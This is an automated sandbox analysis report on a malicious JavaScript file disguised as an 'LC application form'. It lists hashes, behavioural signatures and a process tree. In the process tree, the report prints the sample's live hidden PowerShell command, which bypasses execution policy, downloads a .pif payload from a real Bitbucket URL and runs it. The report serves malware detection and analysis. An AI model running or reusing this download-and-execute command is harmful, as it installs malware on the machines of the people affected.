Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
10-05-2023 07:44
Static task
static1
Behavioral task
behavioral1
Sample
LC application form.js
Resource
win7-20230220-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
LC application form.js
Resource
win10v2004-20230220-en
windows10-2004-x64
13 signatures
150 seconds
General
-
Target
LC application form.js
-
Size
1KB
-
MD5
e68fcb03ac21ca8b335eb9ddf9642f17
-
SHA1
8824d6d2c27d16dcc98f9318f34b7affae3a58b1
-
SHA256
3047d0a3ab3d9253ba224449235ca0aba29d0827b376d3d2f690c3442bdccad2
-
SHA512
7aeb778438b0fdabc6955605e8e43097a83782e9dedc99c411f1794ef41c2479b34846d46de17ad4da6d67d0916ed466212c098248511fc1ac2d80dee20ca19a
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2032 wrote to memory of 1620 2032 wscript.exe 28 PID 2032 wrote to memory of 1620 2032 wscript.exe 28 PID 2032 wrote to memory of 1620 2032 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\LC application form.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { Invoke-WebRequest -Uri 'https://bitbucket.org/mounmeinlylo/rikirollin/downloads/Anekdotisk.pif' -OutFile 'C:UsersPublicmyscript.pif'; C:UsersPublicmyscript.pif }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-